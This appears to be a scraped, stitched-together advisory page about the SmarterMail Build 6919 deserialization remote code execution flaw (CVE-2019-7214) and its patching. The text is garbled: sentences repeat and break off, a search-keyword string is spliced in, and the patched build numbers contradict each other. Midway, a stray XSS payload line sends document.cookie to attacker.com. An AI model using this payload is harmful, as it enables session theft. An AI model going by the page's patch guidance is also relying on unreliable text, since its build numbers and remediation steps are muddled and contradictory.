If you are running SmarterMail or any version from the 15.x series, you are likely vulnerable.
SmarterTools has released a patch to address this vulnerability. Immediate action is required.
Log into SmarterMail as System Admin → Settings → About SmarterMail . If your build number is lower than 16.3.7005 , proceed immediately. smartermail 6919 exploit
Patching does not remove the backdoor. If an attacker placed a shell in a log file on January 1st, and you upgrade to Build 6922 on January 15th, that log file is still executable if accessed via the old exploit vector (which is now blocked). However, if the attacker already established a scheduled task or service, patching is futile.
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> If you are running SmarterMail or any version from the 15
: Use of Hardcoded Secret Keys , which could facilitate further compromise.
An attacker can construct a custom, malicious serialized payload. When the server automatically deserializes this payload, it blindly executes embedded commands. Because the core SmarterMail windows service runs with elevated privileges, the injected commands are carried out natively by the host operating system's highest access token: NT AUTHORITY\SYSTEM . Anatomy of the Attack Vector Log into SmarterMail as System Admin → Settings
SmarterMail Build 6919 is affected by a critical Remote Code Execution (RCE) vulnerability, tracked as CVE-2019-7214 , which stems from the deserialization of untrusted data The Core Vulnerability
The fallout from an unpatched mail gateway exploit reaches across the entire corporate perimeter. Data Theft and Espionage
In Build 6985 and all subsequent versions, developers restricted the .NET remoting endpoint listener to bind exclusively to the loopback interface ( 127.0.0.1:17001 ). This prevents remote network entities from executing unauthenticated actions across the socket. 2. Implement Network-Level Microsegmentation